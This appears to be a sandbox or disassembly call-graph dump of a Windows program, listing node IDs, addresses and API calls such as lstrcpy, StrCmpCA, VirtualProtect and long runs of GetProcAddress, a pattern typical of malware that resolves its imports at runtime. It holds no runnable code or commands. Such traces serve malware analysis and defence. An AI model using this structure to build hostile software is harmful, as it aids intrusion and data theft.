14033e 27888 140353 lstrcpy 27887->27888 27889 14035f lstrlen 27887->27889 27888->27889 27890 140378 27889->27890 27891 14038d lstrcpy 27890->27891 27892 140399 lstrlen 27890->27892 27891->27892 27893 1403b8 27892->27893 27894 1403d0 lstrcpy 27893->27894 27895 1403dc lstrlen 27893->27895 27894->27895 27896 14043a 27895->27896 27897 140452 lstrcpy 27896->27897 27898 14045e 27896->27898 27897->27898 28127 122e70 27898->28127 27906 140710 27907 141740 4 API calls 27906->27907 27908 14071f 27907->27908 27909 140771 lstrlen 27908->27909 27910 140769 lstrcpy 27908->27910 27911 14078f 27909->27911 27910->27909 27912 1407a1 lstrcpy lstrcat 27911->27912 27913 1407b9 27911->27913 27912->27913 27914 1407e4 27913->27914 27915 1407dc lstrcpy 27913->27915 27916 1407eb lstrlen 27914->27916 27915->27914 27917 140806 27916->27917 27918 14081a lstrcpy lstrcat 27917->27918 27919 140832 27917->27919 27918->27919 27920 140857 27919->27920 27921 14084f lstrcpy 27919->27921 27922 14085e lstrlen 27920->27922 27921->27920 27923 140883 27922->27923 27924 140897 lstrcpy lstrcat 27923->27924 27925 1408ab 27923->27925 27924->27925 27926 1408d4 lstrcpy 27925->27926 27927 1408dc 27925->27927 27926->27927 27928 140921 27927->27928 27929 140919 lstrcpy 27927->27929 28883 142910 GetWindowsDirectoryA 27928->28883 27929->27928 27931 140955 28892 124c50 27931->28892 27932 14092d 27932->27931 27933 14094d lstrcpy 27932->27933 27933->27931 27935 14095f 29046 138df0 StrCmpCA 27935->29046 27937 14096b 27938 121530 8 API calls 27937->27938 27939 14098c 27938->27939 27940 1409b5 lstrcpy 27939->27940 27941 1409bd 27939->27941 27940->27941 29064 1260d0 80 API calls 27941->29064 27943 1409ca 29065 1382f0 10 API calls 27943->29065 27945 1409d9 27946 121530 8 API calls 27945->27946 27947 1409ff 27946->27947 27948 140a26 lstrcpy 27947->27948 27949 140a2e 27947->27949 27948->27949 29066 1260d0 80 API calls 27949->29066 27951 140a3b 29067 138020 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 27951->29067 27953 140a46 27954 121530 8 API calls 27953->27954 27955 140a71 27954->27955 27956 140aa5 27955->27956 27957 140a99 lstrcpy 27955->27957 29068 1260d0 80 API calls 27956->29068 27957->27956 27959 140aab 29069 138190 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 27959->29069 27961 140ab6 27962 121530 8 API calls 27961->27962 27963 140ac7 27962->27963 27964 140af6 lstrcpy 27963->27964 27965 140afe 27963->27965 27964->27965 29070 125640 8 API calls 27965->29070 27967 140b03 27968 121530 8 API calls 27967->27968 27969 140b1c 27968->27969 29071 1373c0 1453 API calls 27969->29071 27971 140b6f 27972 121530 8 API calls 27971->27972 27973 140b9f 27972->27973 27974 140bc6 lstrcpy 27973->27974 27975 140bce 27973->27975 27974->27975 29072 1260d0 80 API calls 27975->29072 27977 140bdb 29073 138520 7 API calls 27977->29073 27979 140be8 27980 121530 8 API calls 27979->27980 27981 140bf9 27980->27981 29074 1224e0 230 API calls 27981->29074 27983 140c3b 27984 140d10 27983->27984 27985 140c4f 27983->27985 27986 121530 8 API calls 27984->27986 27987 121530 8 API calls 27985->27987 27989 140d29 27986->27989 27988 140c75 27987->27988 27991 140ca4 27988->27991 27992 140c9c lstrcpy 27988->27992 27990 140d57 27989->27990 27993 140d4f lstrcpy 27989->27993 29078 1260d0 80 API calls 27990->29078 29075 1260d0 80 API calls 27991->29075 27992->27991 27993->27990 27996 140d5d 29079 13ca30 70 API calls 27996->29079 27997 140caa 29076 1386f0 47 API calls 27997->29076 28000 140d08 28003 140da1 28000->28003 28006 121530 8 API calls 28000->28006 28001 140cb5 28002 121530 8 API calls 28001->28002 28005 140cc6 28002->28005 28004 140dca 28003->28004 28007 121530 8 API calls 28003->28007 28008 140df3 28004->28008 28013 121530 8 API calls 28004->28013 29077 13d2e0 118 API calls 28005->29077 28010 140d89 28006->28010 28012 140dc5 28007->28012 28011 140e1c 28008->28011 28016 121530 8 API calls 28008->28016 29080 13d9a0 104 API calls 28010->29080 28017 140e45 28011->28017 28022 121530 8 API calls 28011->28022 29082 13e180 149 API calls 28012->29082 28019 140dee 28013->28019 28015 140d8e 28020 121530 8 API calls 28015->28020 28021 140e17 28016->28021 28023 140e6e 28017->28023 28029 121530 8 API calls 28017->28029 29083 13e6e0 108 API calls 28019->29083 28025 140d9c 28020->28025 29084 13e900 120 API calls 28021->29084 28028 140e40 28022->28028 28026 140e97 28023->28026 28032 121530 8 API calls 28023->28032 29081 13ee90 99 API calls 28025->29081 28033 140ec0 28026->28033 28039 121530 8 API calls 28026->28039 29085 13ebc0 110 API calls 28028->29085 28030 140e69 28029->28030 29086 127bc0 153 API calls 28030->29086 28038 140e92 28032->28038 28035 140ed4 28033->28035 28036 140f9a 28033->28036 28040 121530 8 API calls 28035->28040 28041 121530 8 API calls 28036->28041 29087 13ed50 108 API calls 28038->29087 28043 140ebb 28039->28043 28045 140efa 28040->28045 28047 140fb3 28041->28047 29088 1443f0 91 API calls 28043->29088 28048 140f26 lstrcpy 28045->28048 28049 140f2e 28045->28049 28046 140fe1 29092 1260d0 80 API calls 28046->29092 28047->28046 28050 140fd9 lstrcpy 28047->28050 28048->28049 29089 1260d0 80 API calls 28049->29089 28050->28046 28053 140fe7 29093 13ca30 70 API calls 28053->29093 28054 140f34 29090 1386f0 47 API calls 28054->29090 28057 140f92 28060 121530 8 API calls 28057->28060 28058 140f3f 28059 121530 8 API calls 28058->28059 28061 140f50 28059->28061 28064 141009 28060->28064 29091 13d2e0 118 API calls 28061->29091 28063 141037 29094 1260d0 80 API calls 28063->29094 28064->28063 28065 14102f lstrcpy 28064->28065 28065->28063 28067 141044 28069 141065 28067->28069 29095 141830 12 API calls 28067->29095 28069->27747 28070->27718 28072 124a76 RtlAllocateHeap 28071->28072 28075 124ab4 VirtualProtect 28072->28075 28075->27750 28077 1419fe 28076->28077 28078 141a25 lstrlen 28077->28078 28079 141a19 lstrcpy 28077->28079 28080 141a43 28078->28080 28079->28078 28081 141a55 lstrcpy lstrcat 28080->28081 28082 141a68 28080->28082 28081->28082 28083 141a97 28082->28083 28084 141a8f lstrcpy 28082->28084 28085 141a9e lstrlen 28083->28085 28084->28083 28086 141ab6 28085->28086 28087 141ac2 lstrcpy lstrcat 28086->28087 28088 141ad6 28086->28088 28087->28088 28089 141b05 28088->28089 28090 141afd lstrcpy 28088->28090 28091 141b0c lstrlen 28089->28091 28090->28089 28092 141b28 28091->28092 28093 141b3a lstrcpy lstrcat 28092->28093 28094 141b4d 28092->28094 28093->28094 28095 141b7c 28094->28095 28096 141b74 lstrcpy 28094->28096 28097 141b83 lstrlen 28095->28097 28096->28095 28098 141b9b 28097->28098 28099 141ba7 lstrcpy lstrcat 28098->28099 28100 141bbb 28098->28100 28099->28100 28101 141bea 28100->28101 28102 141be2 lstrcpy 28100->28102 28103 141bf1 lstrlen 28101->28103 28102->28101 28104 141c0d 28103->28104 28105 141c1f lstrcpy lstrcat 28104->28105 28106 141c32 28104->28106 28105->28106 28107 141c61 28106->28107 28108 141c59 lstrcpy 28106->28108 28109 141c68 lstrlen 28107->28109 28108->28107 28110 141c84 28109->28110 28111 141c96 lstrcpy lstrcat 28110->28111 28112 141ca9 28110->28112 28111->28112 28113 141cd8 28112->28113 28114 141cd0 lstrcpy 28112->28114 28113->27866 28114->28113 28116 122a24 SystemTimeToFileTime SystemTimeToFileTime 28115->28116 28116->27869 28116->27870 28118 14174f 28117->28118 28119 14176f lstrcpy 28118->28119 28120 141777 28118->28120 28119->28120 28121 1417a7 lstrcpy 28120->28121 28122 1417af 28120->28122 28121->28122 28123 1417df lstrcpy 28122->28123 28124 1417e7 28122->28124 28123->28124 28125 140325 lstrlen 28124->28125 28126 141817 lstrcpy 28124->28126 28125->27887 28126->28125 28128 124a60 2 API calls 28127->28128 28129 122e82 28128->28129 28130 124a60 2 API calls 28129->28130 28131 122ea0 28130->28131 28132 124a60 2 API calls 28131->28132 28133 122eb6 28132->28133 28134 124a60 2 API calls 28133->28134 28135 122ecb 28134->28135 28136 124a60 2 API calls 28135->28136 28137 122eec 28136->28137 28138 124a60 2 API calls 28137->28138 28139 122f01 28138->28139 28140 124a60 2 API calls 28139->28140 28141 122f19 28140->28141 28142 124a60 2 API calls 28141->28142 28143 122f3a 28142->28143 28144 124a60 2 API calls 28143->28144 28145 122f4f 28144->28145 28146 124a60 2 API calls 28145->28146 28147 122f65 28146->28147 28148 124a60 2 API calls 28147->28148 28149 122f7b 28148->28149 28150 124a60 2 API calls 28149->28150 28151 122f91 28150->28151 28152 124a60 2 API calls 28151->28152 28153 122faa 28152->28153 28154 124a60 2 API calls 28153->28154 28155 122fc0 28154->28155 28156 124a60 2 API calls 28155->28156 28157 122fd6 28156->28157 28158 124a60 2 API calls 28157->28158 28159 122fec 28158->28159 28160 124a60 2 API calls 28159->28160 28161 123002 28160->28161 28162 124a60 2 API calls 28161->28162 28163 123018 28162->28163 28164 124a60 2 API calls 28163->28164 28165 123031 28164->28165 28166 124a60 2 API calls 28165->28166 28167 123047 28166->28167 28168 124a60 2 API calls 28167->28168 28169 12305d 28168->28169 28170 124a60 2 API calls 28169->28170 28171 123073 28170->28171 28172 124a60 2 API calls 28171->28172 28173 123089 28172->28173 28174 124a60 2 API calls 28173->28174 28175 12309f 28174->28175 28176 124a60 2 API calls 28175->28176 28177 1230b8 28176->28177 28178 124a60 2 API calls 28177->28178 28179 1230ce 28178->28179 28180 124a60 2 API calls 28179->28180 28181 1230e4 28180->28181 28182 124a60 2 API calls 28181->28182 28183 1230fa 28182->28183 28184 124a60 2 API calls 28183->28184 28185 123110 28184->28185 28186 124a60 2 API calls 28185->28186 28187 123126 28186->28187 28188 124a60 2 API calls 28187->28188 28189 12313f 28188->28189 28190 124a60 2 API calls 28189->28190 28191 123155 28190->28191 28192 124a60 2 API calls 28191->28192 28193 12316b 28192->28193 28194 124a60 2 API calls 28193->28194 28195 123181 28194->28195 28196 124a60 2 API calls 28195->28196 28197 123197 28196->28197 28198 124a60 2 API calls 28197->28198 28199 1231ad 28198->28199 28200 124a60 2 API calls 28199->28200 28201 1231c6 28200->28201 28202 124a60 2 API calls 28201->28202 28203 1231dc 28202->28203 28204 124a60 2 API calls 28203->28204 28205 1231f2 28204->28205 28206 124a60 2 API calls 28205->28206 28207 123208 28206->28207 28208 124a60 2 API calls 28207->28208 28209 12321e 28208->28209 28210 124a60 2 API calls 28209->28210 28211 123234 28210->28211 28212 124a60 2 API calls 28211->28212 28213 12324d 28212->28213 28214 124a60 2 API calls 28213->28214 28215 123263 28214->28215 28216 124a60 2 API calls 28215->28216 28217 123279 28216->28217 28218 124a60 2 API calls 28217->28218 28219 12328f 28218->28219 28220 124a60 2 API calls 28219->28220 28221 1232a5 28220->28221 28222 124a60 2 API calls 28221->28222 28223 1232bb 28222->28223 28224 124a60 2 API calls 28223->28224 28225 1232d4 28224->28225 28226 124a60 2 API calls 28225->28226 28227 1232ea 28226->28227 28228 124a60 2 API calls 28227->28228 28229 123300 28228->28229 28230 124a60 2 API calls 28229->28230 28231 123316 28230->28231 28232 124a60 2 API calls 28231->28232 28233 12332c 28232->28233 28234 124a60 2 API calls 28233->28234 28235 123342 28234->28235 28236 124a60 2 API calls 28235->28236 28237 12335b 28236->28237 28238 124a60 2 API calls 28237->28238 28239 123371 28238->28239 28240 124a60 2 API calls 28239->28240 28241 123387 28240->28241 28242 124a60 2 API calls 28241->28242 28243 12339d 28242->28243 28244 124a60 2 API calls 28243->28244 28245 1233b3 28244->28245 28246 124a60 2 API calls 28245->28246 28247 1233c9 28246->28247 28248 124a60 2 API calls 28247->28248 28249 1233e2 28248->28249 28250 124a60 2 API calls 28249->28250 28251 1233f8 28250->28251 28252 124a60 2 API calls 28251->28252 28253 12340e 28252->28253 28254 124a60 2 API calls 28253->28254 28255 123424 28254->28255 28256 124a60 2 API calls 28255->28256 28257 12343a 28256->28257 28258 124a60 2 API calls 28257->28258 28259 123450 28258->28259 28260 124a60 2 API calls 28259->28260 28261 123469 28260->28261 28262 124a60 2 API calls 28261->28262 28263 12347f 28262->28263 28264 124a60 2 API calls 28263->28264 28265 123495 28264->28265 28266 124a60 2 API calls 28265->28266 28267 1234ab 28266->28267 28268 124a60 2 API calls 28267->28268 28269 1234c1 28268->28269 28270 124a60 2 API calls 28269->28270 28271 1234d7 28270->28271 28272 124a60 2 API calls 28271->28272 28273 1234f0 28272->28273 28274 124a60 2 API calls 28273->28274 28275 123506 28274->28275 28276 124a60 2 API calls 28275->28276 28277 12351c 28276->28277 28278 124a60 2 API calls 28277->28278 28279 123532 28278->28279 28280 124a60 2 API calls 28279->28280 28281 123548 28280->28281 28282 124a60 2 API calls 28281->28282 28283 12355e 28282->28283 28284 124a60 2 API calls 28283->28284 28285 123577 28284->28285 28286 124a60 2 API calls 28285->28286 28287 12358d 28286->28287 28288 124a60 2 API calls 28287->28288 28289 1235a3 28288->28289 28290 124a60 2 API calls 28289->28290 28291 1235b9 28290->28291 28292 124a60 2 API calls 28291->28292 28293 1235cf 28292->28293 28294 124a60 2 API calls 28293->28294 28295 1235e5 28294->28295 28296 124a60 2 API calls 28295->28296 28297 1235fe 28296->28297 28298 124a60 2 API calls 28297->28298 28299 123614 28298->28299 28300 124a60 2 API calls 28299->28300 28301 12362a 28300->28301 28302 124a60 2 API calls 28301->28302 28303 123640 28302->28303 28304 124a60 2 API calls 28303->28304 28305 123656 28304->28305 28306 124a60 2 API calls 28305->28306 28307 12366c 28306->28307 28308 124a60 2 API calls 28307->28308 28309 123685 28308->28309 28310 124a60 2 API calls 28309->28310 28311 12369b 28310->28311 28312 124a60 2 API calls 28311->28312 28313 1236b1 28312->28313 28314 124a60 2 API calls 28313->28314 28315 1236c7 28314->28315 28316 124a60 2 API calls 28315->28316 28317 1236dd 28316->28317 28318 124a60 2 API calls 28317->28318 28319 1236f3 28318->28319 28320 124a60 2 API calls 28319->28320 28321 12370c 28320->28321 28322 124a60 2 API calls 28321->28322 28323 123722 28322->28323 28324 124a60 2 API calls 28323->28324 28325 123738 28324->28325 28326 124a60 2 API calls 28325->28326 28327 12374e 28326->28327 28328 124a60 2 API calls 28327->28328 28329 123764 28328->28329 28330 124a60 2 API calls 28329->28330 28331 12377a 28330->28331 28332 124a60 2 API calls 28331->28332 28333 123793 28332->28333 28334 124a60 2 API calls 28333->28334 28335 1237a9 28334->28335 28336 124a60 2 API calls 28335->28336 28337 1237bf 28336->28337 28338 124a60 2 API calls 28337->28338 28339 1237d5 28338->28339 28340 124a60 2 API calls 28339->28340 28341 1237eb 28340->28341 28342 124a60 2 API calls 28341->28342 28343 123801 28342->28343 28344 124a60 2 API calls 28343->28344 28345 12381a 28344->28345 28346 124a60 2 API calls 28345->28346 28347 123830 28346->28347 28348 124a60 2 API calls 28347->28348 28349 123846 28348->28349 28350 124a60 2 API calls 28349->28350 28351 12385c 28350->28351 28352 124a60 2 API calls 28351->28352 28353 123872 28352->28353 28354 124a60 2 API calls 28353->28354 28355 123888 28354->28355 28356 124a60 2 API calls 28355->28356 28357 1238a1 28356->28357 28358 124a60 2 API calls 28357->28358 28359 1238b7 28358->28359 28360 124a60 2 API calls 28359->28360 28361 1238cd 28360->28361 28362 124a60 2 API calls 28361->28362 28363 1238e3 28362->28363 28364 124a60 2 API calls 28363->28364 28365 1238f9 28364->28365 28366 124a60 2 API calls 28365->28366 28367 12390f 28366->28367 28368 124a60 2 API calls 28367->28368 28369 123928 28368->28369 28370 124a60 2 API calls 28369->28370 28371 12393e 28370->28371 28372 124a60 2 API calls 28371->28372 28373 123954 28372->28373 28374 124a60 2 API calls 28373->28374 28375 12396a 28374->28375 28376 124a60 2 API calls 28375->28376 28377 123980 28376->28377 28378 124a60 2 API calls 28377->28378 28379 123996 28378->28379 28380 124a60 2 API calls 28379->28380 28381 1239af 28380->28381 28382 124a60 2 API calls 28381->28382 28383 1239c5 28382->28383 28384 124a60 2 API calls 28383->28384 28385 1239db 28384->28385 28386 124a60 2 API calls 28385->28386 28387 1239f1 28386->28387 28388 124a60 2 API calls 28387->28388 28389 123a07 28388->28389 28390 124a60 2 API calls 28389->28390 28391 123a1d 28390->28391 28392 124a60 2 API calls 28391->28392 28393 123a36 28392->28393 28394 124a60 2 API calls 28393->28394 28395 123a4c 28394->28395 28396 124a60 2 API calls 28395->28396 28397 123a62 28396->28397 28398 124a60 2 API calls 28397->28398 28399 123a78 28398->28399 28400 124a60 2 API calls 28399->28400 28401 123a8e 28400->28401 28402 124a60 2 API calls 28401->28402 28403 123aa4 28402->28403 28404 124a60 2 API calls 28403->28404 28405 123abd 28404->28405 28406 124a60 2 API calls 28405->28406 28407 123ad3 28406->28407 28408 124a60 2 API calls 28407->28408 28409 123ae9 28408->28409 28410 124a60 2 API calls 28409->28410 28411 123aff 28410->28411 28412 124a60 2 API calls 28411->28412 28413 123b15 28412->28413 28414 124a60 2 API calls 28413->28414 28415 123b2b 28414->28415 28416 124a60 2 API calls 28415->28416 28417 123b44 28416->28417 28418 124a60 2 API calls 28417->28418 28419 123b5a 28418->28419 28420 124a60 2 API calls 28419->28420 28421 123b70 28420->28421 28422 124a60 2 API calls 28421->28422 28423 123b86 28422->28423 28424 124a60 2 API calls 28423->28424 28425 123b9c 28424->28425 28426 124a60 2 API calls 28425->28426 28427 123bb2 28426->28427 28428 124a60 2 API calls 28427->28428 28429 123bcb 28428->28429 28430 124a60 2 API calls 28429->28430 28431 123be1 28430->28431 28432 124a60 2 API calls 28431->28432 28433 123bf7 28432->28433 28434 124a60 2 API calls 28433->28434 28435 123c0d 28434->28435 28436 124a60 2 API calls 28435->28436 28437 123c23 28436->28437 28438 124a60 2 API calls 28437->28438 28439 123c39 28438->28439 28440 124a60 2 API calls 28439->28440 28441 123c52 28440->28441 28442 124a60 2 API calls 28441->28442 28443 123c68 28442->28443 28444 124a60 2 API calls 28443->28444 28445 123c7e 28444->28445 28446 124a60 2 API calls 28445->28446 28447 123c94 28446->28447 28448 124a60 2 API calls 28447->28448 28449 123caa 28448->28449 28450 124a60 2 API calls 28449->28450 28451 123cc0 28450->28451 28452 124a60 2 API calls 28451->28452 28453 123cd9 28452->28453 28454 124a60 2 API calls 28453->28454 28455 123cef 28454->28455 28456 124a60 2 API calls 28455->28456 28457 123d05 28456->28457 28458 124a60 2 API calls 28457->28458 28459 123d1b 28458->28459 28460 124a60 2 API calls 28459->28460 28461 123d31 28460->28461 28462 124a60 2 API calls 28461->28462 28463 123d47 28462->28463 28464 124a60 2 API calls 28463->28464 28465 123d60 28464->28465 28466 124a60 2 API calls 28465->28466 28467 123d76 28466->28467 28468 124a60 2 API calls 28467->28468 28469 123d8c 28468->28469 28470 124a60 2 API calls 28469->28470 28471 123da2 28470->28471 28472 124a60 2 API calls 28471->28472 28473 123db8 28472->28473 28474 124a60 2 API calls 28473->28474 28475 123dce 28474->28475 28476 124a60 2 API calls 28475->28476 28477 123de7 28476->28477 28478 124a60 2 API calls 28477->28478 28479 123dfd 28478->28479 28480 124a60 2 API calls 28479->28480 28481 123e13 28480->28481 28482 124a60 2 API calls 28481->28482 28483 123e29 28482->28483 28484 124a60 2 API calls 28483->28484 28485 123e3f 28484->28485 28486 124a60 2 API calls 28485->28486 28487 123e55 28486->28487 28488 124a60 2 API calls 28487->28488 28489 123e6e 28488->28489 28490 124a60 2 API calls 28489->28490 28491 123e84 28490->28491 28492 124a60 2 API calls 28491->28492 28493 123e9a 28492->28493 28494 124a60 2 API calls 28493->28494 28495 123eb0 28494->28495 28496 124a60 2 API calls 28495->28496 28497 123ec6 28496->28497 28498 124a60 2 API calls 28497->28498 28499 123edc 28498->28499 28500 124a60 2 API calls 28499->28500 28501 123ef5 28500->28501 28502 124a60 2 API calls 28501->28502 28503 123f0b 28502->28503 28504 124a60 2 API calls 28503->28504 28505 123f21 28504->28505 28506 124a60 2 API calls 28505->28506 28507 123f37 28506->28507 28508 124a60 2 API calls 28507->28508 28509 123f4d 28508->28509 28510 124a60 2 API calls 28509->28510 28511 123f63 28510->28511 28512 124a60 2 API calls 28511->28512 28513 123f7c 28512->28513 28514 124a60 2 API calls 28513->28514 28515 123f92 28514->28515 28516 124a60 2 API calls 28515->28516 28517 123fa8 28516->28517 28518 124a60 2 API calls 28517->28518 28519 123fbe 28518->28519 28520 124a60 2 API calls 28519->28520 28521 123fd4 28520->28521 28522 124a60 2 API calls 28521->28522 28523 123fea 28522->28523 28524 124a60 2 API calls 28523->28524 28525 124003 28524->28525 28526 124a60 2 API calls 28525->28526 28527 124019 28526->28527 28528 124a60 2 API calls 28527->28528 28529 12402f 28528->28529 28530 124a60 2 API calls 28529->28530 28531 124045 28530->28531 28532 124a60 2 API calls 28531->28532 28533 12405b 28532->28533 28534 124a60 2 API calls 28533->28534 28535 124071 28534->28535 28536 124a60 2 API calls 28535->28536 28537 12408a 28536->28537 28538 124a60 2 API calls 28537->28538 28539 1240a0 28538->28539 28540 124a60 2 API calls 28539->28540 28541 1240b6 28540->28541 28542 124a60 2 API calls 28541->28542 28543 1240cc 28542->28543 28544 124a60 2 API calls 28543->28544 28545 1240e2 28544->28545 28546 124a60 2 API calls 28545->28546 28547 1240f8 28546->28547 28548 124a60 2 API calls 28547->28548 28549 124111 28548->28549 28550 124a60 2 API calls 28549->28550 28551 124127 28550->28551 28552 124a60 2 API calls 28551->28552 28553 12413d 28552->28553 28554 124a60 2 API calls 28553->28554 28555 124153 28554->28555 28556 124a60 2 API calls 28555->28556 28557 124169 28556->28557 28558 124a60 2 API calls 28557->28558 28559 12417f 28558->28559 28560 124a60 2 API calls 28559->28560 28561 124198 28560->28561 28562 124a60 2 API calls 28561->28562 28563 1241ae 28562->28563 28564 124a60 2 API calls 28563->28564 28565 1241c4 28564->28565 28566 124a60 2 API calls 28565->28566 28567 1241da 28566->28567 28568 124a60 2 API calls 28567->28568 28569 1241f0 28568->28569 28570 124a60 2 API calls 28569->28570 28571 124206 28570->28571 28572 124a60 2 API calls 28571->28572 28573 12421f 28572->28573 28574 124a60 2 API calls 28573->28574 28575 124235 28574->28575 28576 124a60 2 API calls 28575->28576 28577 12424b 28576->28577 28578 124a60 2 API calls 28577->28578 28579 124261 28578->28579 28580 124a60 2 API calls 28579->28580 28581 124277 28580->28581 28582 124a60 2 API calls 28581->28582 28583 12428d 28582->28583 28584 124a60 2 API calls 28583->28584 28585 1242a6 28584->28585 28586 124a60 2 API calls 28585->28586 28587 1242bc 28586->28587 28588 124a60 2 API calls 28587->28588 28589 1242d2 28588->28589 28590 124a60 2 API calls 28589->28590 28591 1242e8 28590->28591 28592 124a60 2 API calls 28591->28592 28593 1242fe 28592->28593 28594 124a60 2 API calls 28593->28594 28595 124314 28594->28595 28596 124a60 2 API calls 28595->28596 28597 12432d 28596->28597 28598 124a60 2 API calls 28597->28598 28599 124343 28598->28599 28600 124a60 2 API calls 28599->28600 28601 124359 28600->28601 28602 124a60 2 API calls 28601->28602 28603 12436f 28602->28603 28604 124a60 2 API calls 28603->28604 28605 124385 28604->28605 28606 124a60 2 API calls 28605->28606 28607 12439b 28606->28607 28608 124a60 2 API calls 28607->28608 28609 1243b4 28608->28609 28610 124a60 2 API calls 28609->28610 28611 1243ca 28610->28611 28612 124a60 2 API calls 28611->28612 28613 1243e0 28612->28613 28614 124a60 2 API calls 28613->28614 28615 1243f6 28614->28615 28616 124a60 2 API calls 28615->28616 28617 12440c 28616->28617 28618 124a60 2 API calls 28617->28618 28619 124422 28618->28619 28620 124a60 2 API calls 28619->28620 28621 12443b 28620->28621 28622 124a60 2 API calls 28621->28622 28623 124451 28622->28623 28624 124a60 2 API calls 28623->28624 28625 124467 28624->28625 28626 124a60 2 API calls 28625->28626 28627 12447d 28626->28627 28628 124a60 2 API calls 28627->28628 28629 124493 28628->28629 28630 124a60 2 API calls 28629->28630 28631 1244a9 28630->28631 28632 124a60 2 API calls 28631->28632 28633 1244c2 28632->28633 28634 124a60 2 API calls 28633->28634 28635 1244d8 28634->28635 28636 124a60 2 API calls 28635->28636 28637 1244ee 28636->28637 28638 124a60 2 API calls 28637->28638 28639 124504 28638->28639 28640 124a60 2 API calls 28639->28640 28641 12451a 28640->28641 28642 124a60 2 API calls 28641->28642 28643 124530 28642->28643 28644 124a60 2 API calls 28643->28644 28645 124549 28644->28645 28646 124a60 2 API calls 28645->28646 28647 12455f 28646->28647 28648 124a60 2 API calls 28647->28648 28649 124575 28648->28649 28650 124a60 2 API calls 28649->28650 28651 12458b 28650->28651 28652 124a60 2 API calls 28651->28652 28653 1245a1 28652->28653 28654 124a60 2 API calls 28653->28654 28655 1245b7 28654->28655 28656 124a60 2 API calls 28655->28656 28657 1245d0 28656->28657 28658 124a60 2 API calls 28657->28658 28659 1245e6 28658->28659 28660 124a60 2 API calls 28659->28660 28661 1245fc 28660->28661 28662 124a60 2 API calls 28661->28662 28663 124612 28662->28663 28664 124a60 2 API calls 28663->28664 28665 124628 28664->28665 28666 124a60 2 API calls 28665->28666 28667 12463e 28666->28667 28668 124a60 2 API calls 28667->28668 28669 124657 28668->28669 28670 124a60 2 API calls 28669->28670 28671 12466d 28670->28671 28672 124a60 2 API calls 28671->28672 28673 124683 28672->28673 28674 124a60 2 API calls 28673->28674 28675 124699 28674->28675 28676 124a60 2 API calls 28675->28676 28677 1246af 28676->28677 28678 124a60 2 API calls 28677->28678 28679 1246c5 28678->28679 28680 124a60 2 API calls 28679->28680 28681 1246de 28680->28681 28682 124a60 2 API calls 28681->28682 28683 1246f4 28682->28683 28684 124a60 2 API calls 28683->28684 28685 12470a 28684->28685 28686 124a60 2 API calls 28685->28686 28687 124720 28686->28687 28688 124a60 2 API calls 28687->28688 28689 124736 28688->28689 28690 124a60 2 API calls 28689->28690 28691 12474c 28690->28691 28692 124a60 2 API calls 28691->28692 28693 124765 28692->28693 28694 124a60 2 API calls 28693->28694 28695 12477b 28694->28695 28696 124a60 2 API calls 28695->28696 28697 124791 28696->28697 28698 124a60 2 API calls 28697->28698 28699 1247a7 28698->28699 28700 124a60 2 API calls 28699->28700 28701 1247bd 28700->28701 28702 124a60 2 API calls 28701->28702 28703 1247d3 28702->28703 28704 124a60 2 API calls 28703->28704 28705 1247ec 28704->28705 28706 124a60 2 API calls 28705->28706 28707 124802 28706->28707 28708 124a60 2 API calls 28707->28708 28709 124818 28708->28709 28710 124a60 2 API calls 28709->28710 28711 12482e 28710->28711 28712 124a60 2 API calls 28711->28712 28713 124844 28712->28713 28714 124a60 2 API calls 28713->28714 28715 12485a 28714->28715 28716 124a60 2 API calls 28715->28716 28717 124873 28716->28717 28718 124a60 2 API calls 28717->28718 28719 124889 28718->28719 28720 124a60 2 API calls 28719->28720 28721 12489f 28720->28721 28722 124a60 2 API calls 28721->28722 28723 1248b5 28722->28723 28724 124a60 2 API calls 28723->28724 28725 1248cb 28724->28725 28726 124a60 2 API calls 28725->28726 28727 1248e1 28726->28727 28728 124a60 2 API calls 28727->28728 28729 1248fa 28728->28729 28730 124a60 2 API calls 28729->28730 28731 124910 28730->28731 28732 124a60 2 API calls 28731->28732 28733 124926 28732->28733 28734 124a60 2 API calls 28733->28734 28735 12493c 28734->28735 28736 124a60 2 API calls 28735->28736 28737 124952 28736->28737 28738 124a60 2 API calls 28737->28738 28739 124968 28738->28739 28740 124a60 2 API calls 28739->28740 28741 124981 28740->28741 28742 124a60 2 API calls 28741->28742 28743 124997 28742->28743 28744 124a60 2 API calls 28743->28744 28745 1249ad 28744->28745 28746 124a60 2 API calls 28745->28746 28747 1249c3 28746->28747 28748 124a60 2 API calls 28747->28748 28749 1249d9 28748->28749 28750 124a60 2 API calls 28749->28750 28751 1249ef 28750->28751 28752 124a60 2 API calls 28751->28752 28753 124a08 28752->28753 28754 124a60 2 API calls 28753->28754 28755 124a1e 28754->28755 28756 124a60 2 API calls 28755->28756 28757 124a34 28756->28757 28758 124a60 2 API calls 28757->28758 28759 124a4a 28758->28759 28760 1468f0 28759->28760 28761 1468fd 43 API calls 28760->28761 28762 146d0e 8 API calls 28760->28762 28761->28762 28763 146da4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28762->28763 28764 146e18 28762->28764 28763->28764 28765 146e25 8 API calls 28764->28765 28766 146ee2 28764->28766 28765->28766 28767 146f5f 28766->28767 28768 146eeb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28766->28768 28769 146f6c 6 API calls 28767->28769 28770 146ff9 28767->28770 28768->28767 28769->28770 28771 147006 12 API calls 28770->28771 28772 147120 28770->28772 28771->28772 28773 14719d 28772->28773 28774 147129 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28772->28774 28775 1471a6 GetProcAddress GetProcAddress 28773->28775 28776 1471d1 28773->28776 28774->28773 28775->28776 28777 147205 28776->28777 28778 1471da GetProcAddress GetProcAddress 28776->28778 28779 147212 10 API calls 28777->28779 28780 1472fd 28777->28780 28778->28777 28779->28780 28781 147306 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28780->28781 28782 147362 28780->28782 28781->28782 28783 14737e 28782->28783 28784 14736b GetProcAddress 28782->28784 28785 147387 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28783->28785 28786 1406ef 28783->28786 28784->28783 28785->28786 28787 121530 28786->28787 29096 121610 28787->29096 28789 12153b 28790 121555 lstrcpy 28789->28790 28791 12155d 28789->28791 28790->28791 28792 121577 lstrcpy 28791->28792 28793 12157f 28791->28793 28792->28793 28794 121599 lstrcpy 28793->28794 28795 1215a1 28793->28795 28794->28795 28796 121605 28795->28796 28797 1215fd lstrcpy 28795->28797 28798 13f390 lstrlen 28796->28798 28797->28796 28799 13f3c4 28798->28799 28800 13f3d7 